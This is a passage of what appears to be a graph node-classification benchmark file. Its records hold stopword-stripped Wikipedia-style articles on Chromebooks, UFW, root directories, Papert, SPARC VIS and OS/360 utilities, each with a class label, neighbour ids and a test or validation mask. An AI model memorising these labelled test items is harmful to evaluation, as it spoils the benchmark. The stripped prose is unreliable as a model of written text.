chromebooks primarily designed use connected internet signed google account instead installing traditional applications word processing instant messaging users add web apps chrome web store google claims multi-layer security architecture eliminates need anti-virus software support many usb devices cameras mice external keyboards flash drives included utilizing feature similar plug-and-play operating systems like prototype cr-48 chromebooks specialized keyboard complete buttons opening controlling multiple browser-windows well web search button replaces caps lock key caps lock activated pressing alt+search analysis samsung series 5 components ifixit june 2011 estimated total cost 334.32 representing us 322.12 materials us 12.20 labor initial retail price us 499.99 also pays retail margins shipping marketing research development profit margins chromebooks quite thin requiring large production run make profit chromebooks designed used connected internet users able access google applications gmail google calendar google keep google drive offline mode chromebooks also come built-in local music-player photo editor pdf- microsoft office document-viewer functional without internet access apps offline support include amazon cloud reader new york times app angry birds google play video content available offline using extension chrome browser chromebooks except first three boot help coreboot fast-booting bios integration android chrome announced 2016 anticipated drive design form factor future chromebooks including expected first chrome os tablet first two commercially available chromebooks samsung series 5 acer ac700 unveiled may 11 2011 google i/o developer conference begin selling online channels including amazon best buy united states united kingdom france germany netherlands italy spain starting june 15 2011 however acer ac700 available early july first machines sold 349 499 depending model 3g option google also offered monthly payment scheme business education customers 28 20 per user per month respectively three-year contract including replacements upgrades verizon offers models equipped 3g/4g lte connectivity 100–200 mb free wireless data per month two years google early marketing efforts relied primarily hands-on experience giving away samsung machines 10 cr-48 pilot program participants along title chromebook guru lending chromebooks passengers virgin america flights end september 2011 google launched chrome zone store within store inside currys pc world superstore london store google-style look feel splashes color around retail store front concept later changed broader in-store google shop expanded beyond pc world tottenham court road addition marketing strategies google chrome created several chromebook minis demonstrate ease use simplicity devices comical manner example question back chromebook asked implied refer data backup instead shows two hands pushing chromebook back end table followed statement n't back chromebook showing data stored web article published zdnet june 2011 entitled five chromebook concerns businesses steven j. vaughan-nichols faulted devices lack virtual private network capability supporting wi-fi security methods particular wi-fi protected access ii wpa2 enterprise extensible authentication protocol-transport layer security eap-tls cisco lightweight extensible authentication protocol leap also noted file manager work need use undocumented crosh shell accomplish basic tasks setting secure shell ssh network connection well serious deficiencies documentation one first customer reviews city orlando florida reported initial testing 600 chromebooks part broader study related accessing virtual desktops early indications show potential value reducing support costs end users indicated chromebook easy travel starts quickly one stated need stay connected emergencies take chrome traveling business would still take laptop orlando plan continue use chromebooks november 21 2011 google announced price reductions chromebooks since wi-fi-only samsung series 5 reduced 349 3g samsung series 5 reduced 449 acer ac700 reduced 299 updated series 5 550 chromebox first chrome os desktop machines released samsung may 2012 two lowest cost chromebooks emerged later fall 249 samsung series 3 199 acer c7 following february google introduced costly machine chromebook pixel starting price 1299 models released may 2012 include 100 gb–1.09 tb google drive cloud storage 12 gogo wifi passes january 2013 acer chromebook sales driven heavy internet users educational institutions platform represented 5-10 percent company us shipments according acer president jim wong called numbers sustainable contrasting low windows 8 sales blamed slump market wong said company would consider marketing chromebooks developed countries well corporations noted although chrome os free license hardware vendors required greater marketing expenditure windows offsetting licensing savings first 11 months 2013 1.76 million chromebooks sold united states representing 21 us commercial business-to-business laptop market period 2012 chromebooks sold 400,000 units negligible market share january 2015 silviu stahie noted softpedia chromebooks eating microsoft market share said microsoft engaged silent war actually losing fighting enemy insidious cunning actually hurting company anything else enemy called chromebooks using linux ... sign things slowing microsoft really needs win soon wants remain relevant 2015 chromebooks sales volume companies us second windows based devices android tablets overtaking apple devices 2014 chromebook sales u.s. b2b channels increased 43 percent first half 2015 helping keep overall b2b pc tablet sales falling .. sales google os-equipped android chrome devices saw 29 percent increase 2014 propelled chromebook sales apple devices declined 12 percent windows devices fell 8 percent education market chromebooks notable success competing low cost hardware software upkeep simplicity machines could drawback markets proven advantage school districts reducing training maintenance costs january 2012 even commercial sales flat google placed nearly 27,000 chromebooks schools across 41 states us including one-on-one programs allocate computer every student south carolina illinois iowa august 2012 500 school districts united states europe using device 2016 chromebooks represented 58 percent 2.6 million mobile devices purchased u.s. schools 64 percent market outside u.s. contrast sales apple tablets laptops u.s. schools dropped year 19 percent compared 52 percent 2012 helping spur chromebook sales google classroom app designed teachers 2014 serves hub classroom activities including attendance classroom discussions homework communication students parents however concerns privacy within context education market chromebooks school officials schools issuing chromebooks students affirmed students right privacy using school-issued chromebooks even home online offline activity monitored school using third-party software pre-installed laptops electronic frontier foundation complained google violating privacy students enabling synchronisation function within google chrome chrome sync default allowing web browsing histories data students including under-13 stored google servers potentially used purposes authorised educational purposes point contention fact users school-issued chromebooks change settings measure protect privacy administrator issued laptops change eff claims violates student privacy pledge already signed google 2014 eff staff attorney nate cardozo stated minors n't tracked used guinea pigs data treated profit center google wants use students data 'improve google products needs get express consent parents march 2018 chromebooks made 60 computers used schools cnet writer alfred ng cited superior security main reason level market adoption hardware generation linux kernel version products inferred code name corresponding video game series december 7 2010 press briefing google announced chrome os pilot program pilot experiment first chromebook cr-48 chrome notebook prototype test chrome os operating system modified hardware device minimal design black completely unbranded although made inventec rubberized coating device named chromium-48 unstable isotope metallic element chromium participants named cr-48 test pilots google distributed 60,000 cr-48 chrome notebooks december 2010 march 2011 free participants return asked feedback suggestions bug reports cr-48 intended testing retail sales cr-48 hardware design broke convention replacing certain keys shortcut keys function keys replacing caps lock key dedicated search key changed back caps lock os keyboard settings google addressed complaints operating system offers little functionality host device connected internet demonstrated offline version google docs announced 3g plan would give users 100 mb free data month additional paid plans available verizon device usb port capable supporting keyboard mouse ethernet adapter usb storage printer chrome os offers print stack adding hardware outside previously mentioned items likely cause problems operating system self knowing security model users instead encouraged use secure service called google cloud print print legacy printers connected desktop computers connect hp eprint kodak hero kodak esp epson connect printer google cloud print service cloud aware printer connection cr-48 prototype laptop gave reviewers first opportunity evaluate chrome os running device ryan paul ars technica wrote machine met basic requirements web surfing gaming personal productivity falls short intensive tasks praised google approach security wondered whether mainstream computer users would accept operating system whose application browser thought chrome os could appeal niche audiences people need browser companies rely google apps web applications operating system decidedly full-fledged alternative general purpose computing environments currently ship netbooks paul wrote chrome os advantages found software environments without sacrifice native applications reviewing cr-48 december 29 2010 kurt bakke conceivably tech wrote chromebook become frequently used family appliance household 15 second startup time dedicated google user accounts made go-to device quick searches email well youtube facebook activities device replace five notebooks house one gaming two kids two general use biggest complaint heard lack performance flash applications ongoing testing wolfgang gruener also writing conceivably tech said cloud computing cellular data speeds unacceptable lack offline ability turns cr-48 useless brick connected difficult use chromebook everyday device give used mac/windows pc surely enjoy dedicated cloud computing capabilities occasionally cr-48 features intel atom 455 single-core processor 512 kb cache hyperthreading enabled also features 2 gb removable ddr3 memory single so-dimm integrated chipset graphics 66 watt-hour battery found intel nm10 chipset get hot operation due lack proper heatsink fixed production chromebooks launched google february 2013 chromebook pixel high-end machine chromebook family laptop unusual 3:2 display aspect ratio touch screen featuring debut highest pixel density laptop faster cpu predecessors intel core i5 exterior design described wired austere rectangular block aluminum subtly rounded edges second pixel featuring lte wireless communication twice storage capacity shipped arrival april 12 2013 machine received much media attention many reviewers questioning pixel value proposition compared similarly priced windows machines macbook air 2017 google launched pixelbook replace chromebook pixel like chromebook pixel pixelbook 3:2 aspect ratio touchscreen high pixel density display.. unlike original chromebook pixel like second generation pixelbook excludes option lte instead implements google instant tethering automatically tethers pixelbook pixel phone mobile connection reviewing samsung series 5 specifications scott stein cnet unimpressed machine 12-inch screen 16 gb onboard storage chrome os might lighter windows xp 'd still prefer media storage space price could also get wi-fi amd e-350-powered ultraportable running windows 7 hand mg siegler techcrunch wrote largely favorable review praising improvements speed trackpad sensitivity cr-48 prototype well long battery life fact models priced ipad june 2011 ifixit dismantled samsung series 5 concluded essentially improved cr-48 rated 6/10 repairability predominantly case opened change battery ram chip soldered motherboard ifixit noted mostly-plastic construction felt little cheap plus side stated screen easy remove components including solid-state drive would easy replace ifixit kyle wiens wrote series 5 fixes major shortfalls cr-48 adds polish necessary strike lust heart broad consumer base sleek looks 8+ hours battery life optimized performance may 2012 samsung introduced chromebook series 5 550 wi-fi model expensive 3g model reviews generally questioned value proposition dana wollman engadget wrote chromebook keyboard put thousand-dollar ultrabooks shame offered better display quality many laptops selling twice much price seems exist vacuum—a place tablet apps n't growing sophisticated transformer-like win8 tablets n't way n't solid budget windows machines choose joe wilcox betanews wrote price performance compares choices chromebook crumbles many potential buyers noted new models sell predecessors price-performance ratio quite favorable compared macbook air specs plenty lower-cost options october 2012 series 3 chromebook introduced san francisco event samsung chromebook xe303 device cheaper thinner lighter chromebook 550 google marketed series 3 computer everyone due simple operating system chrome os affordable price target markets included students first-time computer users well households looking extra computer lower price proved watershed reviewers new york times technology columnist david pogue reversed earlier thumbs-down verdict chromebook writing 250 changes everything price half ipad even less ipad mini ipod touch ’ getting laptop wrote chromebook many things people use computers laptops playing flash videos opening microsoft office documents words google correct asserts chromebook perfect schools second computers homes businesses deploy hundreds machines cnet review series 3 chromebook even favorable saying machine largely delivered computer students additional computer household—especially users already using google web applications like google docs google drive gmail got workable standout hardware battery life good switches quickly 249 price tag means much commitment 550 samsung series 5 550 arrived may review subtracted points performance fine many tasks power users accustomed couple dozen browser tabs open steer clear chromebook 3 distinct distinguished similarly named samsung series 3 several respects newer released 2016 different architecture intel celeron n3050 instead exynos 5 dual arm cortex thinner 0.7 less expensive 100 less series 3 remaining full implementation chromeos hp first chromebook largest chromebook market time pavilion 14 chromebook launched february 3 2013 intel celeron 847 cpu either 2gb 4gb ram battery life long 4 hours larger form factor made friendly all-day use hp introduced chromebook 11 october 8 2013 us december 2013 google hp recalled 145,000 chargers due overheating sales halted resuming redesigned charger following month hp chromebook 14 announced september 11 2013 intel haswell celeron processor usb 3.0 ports 4g broadband updated version chromebook lineup announced september 3 2014 11-inch models included intel processor 14-inch models featured fanless design powered nvidia tegra k1 processor hp chromebooks available several colors two types desktop computers also run chrome os classed small form-factor pcs chromeboxes typically feature power switch set ports local area network usb dvi-d displayport audio chromebooks chromeboxes employ solid-state memory support web applications require external monitor keyboard pointing device chromebase all-in-one chrome os device first model released lg electronics integrated screen speakers 1.3-megapixel webcam microphone suggested retail price 350 company unveiled product january 2014 international ces las vegas chromebit dongle running google chrome os operating system placed hdmi port television monitor device turns display personal computer chromebit allows adding keyboard mouse bluetooth via usb port",
    "neighbors": [
      4096,
      8719,
      3600,
      5649,
      7700,
      9244,
      10780,
      10284,
      8237,
      3633,
      5681,
      10820,
      2635,
      4683,
      11343,
      3664,
      4180,
      8285,
      2658,
      4194,
      5749,
      8821,
      4217,
      9863,
      7816,
      6797,
      5262,
      7822,
      6800,
      11408,
      7833,
      8858,
      10393,
      7841,
      2213,
      1203,
      7354,
      2237,
      7359,
      196,
      3269,
      3782,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      1761,
      2788,
      236,
      9964,
      3822,
      7926,
      6391,
      3836,
      8446,
      5892,
      8455,
      5384,
      10009,
      10525,
      798,
      288,
      4901,
      7983,
      823,
      5431,
      9016,
      2875,
      10045,
      5444,
      11590,
      11592,
      9039,
      3409,
      9057,
      5483,
      8044,
      1400,
      7548,
      1409,
      4995,
      9610,
      6539,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      424,
      3499,
      7595,
      11184,
      8627,
      9163,
      4044,
      4048,
      3043,
      2023,
      6632,
      1515,
      5100,
      9712
    ],
    "mask": "Test"
  },
  {
    "node_id": 9971,
    "label": 4,
    "text": "Uncomplicated_Firewall:uncomplicated firewall uncomplicated firewall ufw program managing netfilter firewall designed easy use uses command-line interface consisting small number simple commands uses iptables configuration ufw available default ubuntu installations 8.04 lts gufw intended easy intuitive graphical user interface managing uncomplicated firewall supports common tasks allowing blocking pre-configured common p2p individual ports gufw designed ubuntu also available debian-based distributions arch linux anywhere python gtk+ ufw available",
    "neighbors": [
      2049,
      2563,
      550,
      10790,
      8753,
      569,
      5178,
      9279,
      2118,
      3654,
      1107,
      4192,
      9324,
      8816,
      3189,
      119,
      10872,
      5755,
      6797,
      1172,
      3243,
      1708,
      3245,
      10433,
      4814,
      9423,
      10451,
      6364,
      5343,
      5860,
      7913,
      10987,
      8943,
      5369,
      1273,
      9983,
      1792,
      9496,
      8476,
      6431,
      5410,
      10531,
      5924,
      8998,
      3885,
      6445,
      7983,
      823,
      11577,
      11073,
      1858,
      5962,
      10574,
      4951,
      9048,
      4953,
      2907,
      3942,
      5990,
      8554,
      7020,
      2930,
      1396,
      4480,
      11669,
      3478,
      3482,
      1436,
      926,
      4511,
      8112,
      439,
      10687,
      8640,
      5057,
      975,
      7121,
      10708,
      4568,
      3550,
      6625,
      7140,
      8177,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 9972,
    "label": 6,
    "text": "Root_directory:root directory computer file system primarily used unix unix-like operating systems root directory first top-most directory hierarchy likened trunk tree starting point branches originate root file system file system contained disk partition root directory located filesystem top file systems mounted system boots use example physical file cabinet separate drawers file cabinet represented highest level sub-directories file system system prompt room file cabinet may represented root directory directories may inside root directory go directories least file system operating systems files placed inside root directory well sub-directories one may envision placing paper files anywhere room file cabinet within room unix abstracts nature tree hierarchy entirely unix unix-like systems root directory denoted codice_1 slash sign though root directory conventionally referred codice_1 directory entry name name empty part initial directory separator character codice_1 filesystem entries including mounted filesystems branches root dos os/2 microsoft windows partition drive letter assignment labeled codice_4 particular partition c common root directory dos os/2 windows support abstract hierarchies partitions mountable within directory another drive though rarely seen possible dos command codice_5 since first added dos achieved windows versions well contexts also possible refer root directory containing mounted drives although contain files directly exist file system instance linking local file using file uri scheme syntax form codice_6 codice_7 standard prefix third 'codice_1 represents root local system unix-like operating systems process idea root directory processes system actual root directory changed calling chroot system call typically done create secluded environment run software requires legacy libraries sometimes simplify software installation debugging chroot meant used enhanced security processes inside break freebsd offers stronger jail system call enables operating-system-level virtualization also serves security purposes restrict files process may access subset file system hierarchy unix systems support directory root directory normally /.. points back inode however changed point super-root directory remote trees mounted example two workstations pcs2a pcs2b connected via connectnodes uunite startup script /../pcs2b could used access root directory pcs2b pcs2a",
    "neighbors": [
      2432,
      3328,
      8837,
      8328,
      6797,
      2193,
      5138,
      10387,
      5397,
      6167,
      2974,
      11680,
      6049,
      9762,
      10149,
      7983,
      11568,
      5425,
      9141,
      10422,
      4919,
      954,
      188,
      700,
      8639,
      3522,
      451,
      8772,
      4423,
      2762,
      4298,
      7244,
      5840,
      5969,
      10068,
      8918,
      10839,
      9946,
      9694,
      8032,
      3300,
      8676,
      10087,
      10473,
      8298,
      491,
      10732,
      6637,
      8301,
      3571,
      5492,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 9973,
    "label": 2,
    "text": "Linux/RK:linux/rk linux/rk implementation resource kernel based linux developed real-time multimedia systems laboratory carnegie mellon university linux/rk consists two major components linux kernel subsystem called portable resource kernel resource kernel provides timely guaranteed enforced access physical resources applications main function operating system kernel multiplex available system resources across multiple requests several applications traditional non-realtime kernel allocates time-multiplexed resource application based fairness metrics certain period resource kernel application request reservation certain amount resource kernel guarantee requested amount available application guarantee resource allocation gives application knowledge amount currently available resources qos manager application optimize system behavior computing best qos obtained available resources",
    "neighbors": [
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 9974,
    "label": 7,
    "text": "Elastic_cloud_storage:elastic cloud storage elastic cloud cloud computing offering provides variable service levels based changing needs elasticity attribute applied cloud services states capacity performance given cloud service expand contract according customer requirements potentially changed automatically consequence software-driven event worst reconfigured quickly customer infrastructure management team elasticity described one five main principles cloud computing rosenburg mateos cloud service manning 2011 cloud computing first described gillet kapor 1996 however first practical implementation consequence strategy leverage amazon excess data center capacity amazon pioneers commercial use technology primarily interested providing “ public ” cloud service whereby could offer customers benefits using cloud particularly utility-based pricing model benefit suppliers followed suit range cloud-based models offering elasticity core component suppliers offering service element public cloud service due perceived weaknesses security least lack proven compliance many organizations particularly financial public sectors slow adopters cloud technologies wary organizations achieve benefits cloud computing adopting private cloud technologies obvious weaknesses two five main principles cloud computing abrogated elasticity utility-based payments alternative form elastic cloud offered vendors emc ibm whereby service based around enterprise infrastructure still retains elements elasticity potential bill consumption elasticity cloud computing ability organization adjust storage requirements terms capacity processing respect operational requirements following benefits operational benefits services acquired quickly meaning evolving requirements business addressed almost immediately giving organization potential agility advantage properly implemented elastic system provision/de-provision according application demands particular business activity spikes provision enabled match demand capacity re-allocated research development r projects r activities longer hindered requirement secure capex budget prior project starting capability simply provisioned cloud released end exercise testing deployment large-scale projects size test needs performed prior final rollout taking advantage elasticity cloud creating full-scale avatar proposed production system realistic data traffic volumes provisioned released needed expensive resources allocated normally apply context customer applying least servers part cloud infrastructure specifically business performance reasons decided invest solid-state storage opposed spinning platters instances due activity spikes less critical process may need moved high-performance resources traditional storage server specification customer elected own/lease hardware select specify servers specifically tuned meet likely needs operation i.e. directly controlling cost/benefit equation utility based payments course key cost driver process notion pay consume acceptable many organizations hardware capacity sourced internally organizations need over-provision applies much traditional outsourcing capex-related expenditure in-house servers cloud platform – heart cloud storage system ability manage hyperscale object storage hadoop distributed files system hdfs elastic storage capability particularly well suited hyperscale hadoop environments capability rapidly respond changing circumstances priorities essential",
    "neighbors": [
      4194,
      5666,
      6153,
      3819,
      9995,
      7248,
      3993,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 9975,
    "label": 9,
    "text": "Seymour_Papert:seymour papert seymour aubrey papert february 29 1928 – july 31 2016 south african-born american mathematician computer scientist educator spent career teaching researching mit one pioneers artificial intelligence constructionist movement education co-inventor wally feurzeig cynthia solomon logo programming language born jewish family papert attended university witwatersrand receiving bachelor arts degree philosophy 1949 followed phd mathematics 1952 went receive second doctorate also mathematics university cambridge 1959 supervised frank smithies papert worked researcher variety places including st. john college cambridge henri poincaré institute university paris university geneva national physical laboratory london becoming research associate mit 1963 held position 1967 became professor applied math made co-director mit artificial intelligence laboratory founding director professor marvin minsky 1981 also served cecil ida green professor education mit 1974 1981 papert worked learning theories known focusing impact new technologies learning general schools learning organizations particular mit papert went create epistemology learning research group mit architecture machine group later became mit media lab developer theory learning called constructionism built upon work jean piaget constructivist learning theories papert worked piaget university geneva 1958 1963 one piaget protégés piaget said one understands ideas well papert papert rethought schools work based theories learning papert used piaget work development logo programming language mit created logo tool improve way children think solve problems small mobile robot called logo turtle developed children shown use solve simple problems environment play main purpose logo foundation research group strengthen ability learn knowledge papert insisted simple language program children learn—like logo—can also advanced functionality expert users part work technology papert proponent knowledge machine one principals one laptop per child initiative manufacture distribute children machine developing nations papert also collaborated construction toy manufacturer lego logo-programmable lego mindstorms robotics kits named groundbreaking 1980 book became political activist opposition parents began anti-apartheid activity says father said know someone talented seymour would throw life away ‘ schwartzes ’ derogatory yiddish expression black people ” subsequently chose self exile leading figure revolutionary socialist circle around socialist review living london 1950s papert also prominent activist south african apartheid policies university education papert married dona strauss later androula christofides henriques papert third wife mit professor sherry turkle together wrote influential paper epistemological pluralism revaluation concrete final 24 years papert married suzanne massie russian scholar author pavlovsk life russian palace land firebird papert aged 78 received serious brain injury struck motor scooter 5 december 2006 crossing street colleague uri wilensky attending 17th international commission mathematical instruction icmi study conference hanoi vietnam underwent emergency surgery remove blood clot french hospital hanoi transferred complex operation swiss air ambulance bombardier challenger jet boston massachusetts moved hospital closer home january 2007 developed sepsis damaged heart valve later replaced 2008 returned home could think communicate clearly walk almost unaided still complicated speech problems receipt extensive rehabilitation support rehabilitation team used principles experiential hands-on learning pioneered papert died home blue hill maine july 31 2016 papert work used researchers fields education computer science influenced work uri wilensky design netlogo collaborated study knowledge restructurations well work andrea disessa development dynaturtles 1981 papert along several others logo group mit started logo computer systems inc. lcsi board chair 20 years working lcsi papert designed number award-winning programs including logowriter lego/logo marketed lego mindstorms also influenced research idit harel caperton coauthoring articles book constructionism chairing advisory board company mamamedia also influenced alan kay dynabook concept worked kay various projects papert guggenheim fellowship 1980 marconi international fellowship 1981 software publishers association lifetime achievement award 1994 smithsonian award computerworld 1997 papert called marvin minsky greatest living mathematics educator mit president l. rafael reif summarized papert lifetime accomplishments mind extraordinary range creativity seymour papert helped revolutionize least three fields study children make sense world development artificial intelligence rich intersection technology learning stamp left mit profound today mit continues expand reach deepen work digital learning particularly grateful seymour groundbreaking vision hope build ideas open doors learners ages around world",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7048,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      4774,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      3389,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      75,
      8908,
      205,
      1613,
      11218,
      9299,
      10712,
      3034,
      3675,
      219,
      10463,
      7392,
      7904,
      11488,
      7267,
      5604,
      8293,
      6502,
      10083,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9976,
    "label": 3,
    "text": "Visual_Instruction_Set:visual instruction set visual instruction set vis simd instruction set extension sparc v9 microprocessors developed sun microsystems five versions vis vis 1 vis 2 vis 2+ vis 3 vis 4 vis 1 introduced 1994 first implemented sun ultrasparc microprocessor 1995 fujitsu sparc64 gp microprocessors 2000 vis 2 first implemented ultrasparc iii subsequent ultrasparc sparc64 microprocessors implement instruction set vis 3 first implemented sparc t4 microprocessor vis 4 first implemented sparc m7 microprocessor vis instruction toolkit like intel mmx sse mmx 8 registers shared fpu stack sparc processors 32 registers also aliased double-precision 64-bit floating point registers simd instruction set extensions risc processors vis strictly conforms main principle risc keep instruction set concise efficient design different comparable extensions cisc processors mmx sse sse2 sse3 sse4 3dnow sometimes programmers must use several vis instructions accomplish operation done one mmx sse instruction kept mind fewer instructions automatically result better performance vis re-uses existing sparc v9 64-bit floating point registers hold multiple 8 16 32-bit integer values respect vis similar design mmx simd architectures sse/sse2/altivec vis includes number operations primarily graphics support integers include 3d 2d conversion edge processing pixel distance four ways use vis code",
    "neighbors": [
      2821,
      1798,
      4491,
      6924,
      4237,
      4241,
      6038,
      9369,
      9500,
      4386,
      9126,
      2088,
      9391,
      1461,
      4664,
      8120,
      8506,
      1085,
      8125,
      8126,
      833,
      7234,
      9665,
      9541,
      3142,
      2638,
      5326,
      977,
      2514,
      5844,
      9428,
      10837,
      8795,
      2655,
      1122,
      7270,
      3431,
      7783,
      10985,
      9964,
      5358,
      9582,
      8944,
      499,
      11636,
      1399,
      4603,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 9977,
    "label": 2,
    "text": "Support_programs_for_OS/360_and_successors:support programs os/360 successors article discusses support programs included available os/360 successors ibm categorizes programs utilities others service aids boundaries always consistent obvious many programs match types utility software following lists describe programs associated os/360 successors dos tpf vm utilities included many programs designed ibm users group share modified extended ibm versions originally written user programs usually invoked via job control language jcl tend use common jcl dd identifiers os z/os operating systems data sets idcams access method services generates modifies virtual storage access method vsam non-vsam datasets idcams introduced along vsam os/vs access method reference derives initial vsam replaces access methods mindset os/vs idcams probably functionality utility programs performing many functions vsam non-vsam files following example illustrates use idcams copy dataset disk dataset 80-byte records system choose block size output example sysin control cards coming in-stream file instead point sequential file pds member containing control cards temporary data-set wish example using sysin files would something like iebcompr compares records sequential partitioned data sets iebcompr utility used compare two sequential partitioned datasets data set comparison performed logical record level therefore iebcompr commonly used verify backup copy data set correct exact match original processing iebcompr compares record data set one one records unequal iebcompr lists following information sysout comparing sequential data sets iebcompr considers data sets equal following conditions met partitioned data sets iebcompr considers data sets equal following conditions met ten unequal comparisons encountered processing iecompr terminates appropriate message note iebcompr flexible user-friendly compare program ca n't restrict comparison certain columns ca n't ignore differences white space n't tell record difference occurs halts 10 differences hand fast present ibm mainframes useful exact match expected comparing load modules reblocked checking copy worked properly comparisons programs reports ispf superc isrsupc compare program often used instead iebcopy copies compresses merges partitioned data sets also select exclude specified members copy operation rename replace members tasks iebcopy perform include following iebcopy utility required job control statements copy follows mydd1 mydd2 dd statements names chosen user partitioned input output data sets respectively defaults sysut1 sysut2 use valid ddname two dd statements ddnames specified utility control statements tell iebcopy name input output data sets need one dd statement pds compressed iebdg 'data generator creates test datasets consisting patterned data control statements define fields records created including position length format initialization performed iebdg use existing dataset input change fields specified control statements example replacing name field random alphabetic text contents field may varied record example rotating characters alphanumeric field left right subsequent record example iebedit selectively copies portions jcl example iebedit program example data set xxxxx.yyyyy.zzzzz contain job include steps named step5 step10 step15 iebedit routine copies selected steps job onto sysut2 output file example internal reader syntax edit statement codice_1 specifies name input job edit statement applies edit statement must apply separate job start specified without type stepname job statement job steps specified job included output default start omitted one edit statement provided first job encountered input data set processed start omitted edit statement first statement processing continues next job statement found input data set codice_2 specifies contents output data set values coded codice_3 specifies output consist job statement job step specified stepname parameter steps follow job step job steps preceding specified step omitted operation position default codice_4 specifies output data set contain job statement job steps specified stepname parameter codice_5 specifies output data set contain job statement job steps belonging job except steps specified stepname parameter codice_6 specifies names job steps want process codice_7 single job step name list step names separated commas sequential range steps separated hyphen example stepa-stepe combination may used one namelist one step name specified entire namelist must enclosed parentheses coded type=position stepname specifies first job step placed output data set job steps preceding step copied output data set coded type=include type=exclude stepname specifies names job steps included excluded operation example stepname= stepa stepf-stepl stepz indicates job steps stepa stepf stepl stepz included excluded operation stepname omitted entire input job whose name specified edit statement copied job name specified first job encountered processed codice_8 specifies message data set include listing output data set default resultant output listed message data set see info iebgener copies records sequential dataset creates partitioned dataset tasks iebgener perform include following example iebgener program copy one dataset another straight copy tasks sort program often faster iebgener thus many mainframe shops make use option automatically routes tasks sort icegener program instead iebgener systems possible send email batch job directing output codice_9 external writer systems technique follows also possible attach files sending email mainframe iebimage manipulates several types definitions aka images ibm 3800 laser printing subsystem ibm 4248 printer common uses forms control buffers fcbs character arrangement tables character definitions images forms printed output along text company logos printed page print 'graybar pages alternating gray white horizontal backgrounds match previous greenbar paper utility many different forms logos could stored images printed needed using standard blank paper thus eliminating need stock many preprinted forms need operators stop printer change paper iebisam unloads loads copies prints isam datasets extracted ibm manual sc26-7414-08 z/os dfsmsdfp utilities iebisam program longer distributed starting z/os v1r7 isam data sets longer processed created opened copied dumped isam data sets still use must converted vsam key-sequenced data sets prior z/os v1r7 could use access method services allocate vsam key-sequenced data set copy isam data set iebptpch print punch prints punches records sequential partitioned dataset tasks iebptpch perform include following empty dataset check dataset checked empty rc=4 else 0 read records 2495 tape cartridge reader changes records sequential dataset member partitioned dataset replaced compatible iebupdte iebupdte update incorporates changes sequential partitioned datasets unix codice_10 utility similar program uses different input format markers e..g insert ... mvs becomes ... unix patch programmers pronounce i.e.b up-ditty iebupdte utility used maintain source libraries functions iebupdte perform include following iebupdte commonly used distribute source libraries tape dasd iebupdte uses job control statements required ieb-type utilities exceptions follow job control used ieupdte follows iefbr14 dummy program normally inserted jcl desired action allocation deletion datasets example iefbr14 step calling sequence os/360 contained return address register 14 branch register 14 would thus immediately exit program however executing program operating system would allocate deallocate datasets specified dd statements commonly used quick way set remove datasets consisted initially single instruction branch register 14 mnemonic used ibm assembler br hence name ief br 14 ief course prefix os/360 job management subsystem single instruction program error — n't set return code hence second instruction added clear return code would exit correct status additional error reported fixed ibm two instruction program error due iefbr14 program link-edited reenterable simultaneously usable one caller hackers taken iefbr14 changed br 14 instruction br 15 thereby creating shortest loop world register 15 contains address iefbr14 module br 15 instruction would simply re-invoke module forever utilities normally used systems programmers maintaining operation system rather programmers application work system ickdsf device support facility installs initializes maintains dasd either operating system standalone assign alternate tracks defective tracks iehdasdr “ direct access storage dump restore ” older program found current z/os manuals dumps datasets disk printer backup restores backups iehdasdr removed mvs/xa iehinitt initialize tape initializes tapes writing tape labels multiple tapes may labeled one run utility ibm standard ascii labels may written example iehinitt program example label 3 tapes 3490 magnetic tape unit tape receive ibm standard label volser incremented one tape labeled tape rewound unloaded labeled update ttr links type iv supervisor call svc routines sys1.svclib applicable os/vs2 later iehlist utility used list entries partitioned dataset pds directory list contents volume table contents vtoc iehlist utility used list entries contained one following example iehlist program job produce formatted listing pds directory pds named xxxx.yyyy.zzzz example iehlist program list vtoc similar iehmove moves copies collections data however dfsms system managed storage environments common ibm recommend using iehmove utility move differs copy following move original data set deleted scratched tasks iehmove perform include following surface iehmove may seen redundant iebgener iebcopy utilities however iehmove powerful main advantage using iehmove need specify space dcb information new data sets iehmove allocates information based existing data sets another advantage iehmove copy move groups data sets well entire volumes data ease moving groups data sets volumes iehmove utility generally favored systems programmers sample iehmove job dd statements iehmove sysprint sysin refer dasd magnetic tape volumes instead individual data sets however referencing volumes pose problem since specifying codice_11 gains exclusive access volume therefore iehmove job runs entire volume datasets unavailable users acceptable private volumes tape mountable dasd volumes unacceptable public volumes sysut1 dd statement specifies dasd volume three work data set required iehmove allocated must specify unit volume information dd statement iehmove one first systems developed pl/s example three sequential data sets seqset1 seqset2 seqset3 moved one disk volume three separate disk volumes three receiving volumes mounted required iehmove source data sets cataloged space allocated iehmove iehprogm builds maintains system control data also used renaming scratching deleting data set tasks iehprogm perform include following cataloging select format smf records tape errors programs run control operating system format direct access volumes assign alternate tracks dump restore direct access volumes assign alternate tracks recover replace data load forms control buffer fcb universal character set ucs buffer printer utility program ibm documents service aids diagnosis manuals original os/360 service aids names beginning ifc im* ibm changed naming convention hm* os/vs1 am* os/vs2 ibm change ifc convention initializes sys1.logrec data set summarizes prints records sys1.logrec error recording data set traces selected system events svc i/o interruptions generates jcl needed apply ptf and/or applies ptf functions program subsumed smp verifies and/or replaces instructions and/or data load module program object formats prints object modules load modules program objects csect identification records maps load modules functions program subsumed imblist stand-alone program format print system job queue applicable mvs format print system job queue applicable mvs formats prints dumps tso swap data set gtf trace data stand-alone program produce high-speed low-speed dump main storage sort/merge utility program sorts records file specified order merge pre-sorted files frequently used often commonly used application program mainframe shop modern sort/merge programs also select omit certain records summarize records remove duplicates reformat records produce simple reports sort/merge important enough multiple companies selling sort/merge package ibm mainframes ibm 